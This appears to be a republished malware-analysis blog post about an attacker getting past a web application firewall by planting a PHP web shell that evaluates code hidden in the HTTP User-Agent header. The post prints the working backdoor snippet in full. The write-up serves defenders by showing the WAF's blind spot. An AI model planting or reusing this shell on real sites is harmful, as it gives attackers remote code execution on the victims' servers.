Republished Malware Analysis Blog Posts From March 2018

WAF Evasion Using HTTP User Agent String

Web application firewalls are often a first line of defense for protecting web sites from malicious actors. Unfortunately, they are not a silver bullet, and in many cases won’t prevent a site from being compromised if the site contains underlying vulnerabilities.

In the case I will describe in this post, an attacker was able to leverage a file upload vulnerability to place a PHP web shell on a victim server. However, a WAF in place was preventing the attacker from executing code through their web shell using POST or GET parameters.

To work around this, another PHP shell was dropped, designed to execute code placed in the User Agent string of the requests made to the shell.

The malicious code:

if (eregi("final",$_SERVER['HTTP_USER_AGENT'])) { 
eval(str_replace('Mozilla/5.0 ( ','',$_SERVER['HTTP_USER_AGENT'])); die; }

In this case, the deployed WAF was only designed to spot potentially malicious activity in locations where user-supplied data was expected, like the values of POST and GET parameters and COOKIE variables.

It’s important to remember, however, that an attacker controls every part of the requests they make to the server – including the contents of the User Agent string.

Final Thoughts:

While this is not a common WAF bypass methodology in my experience, it’s certainly interesting and worth being aware of.

Malware Research

Original Research and Blog Posts by Sky Larsen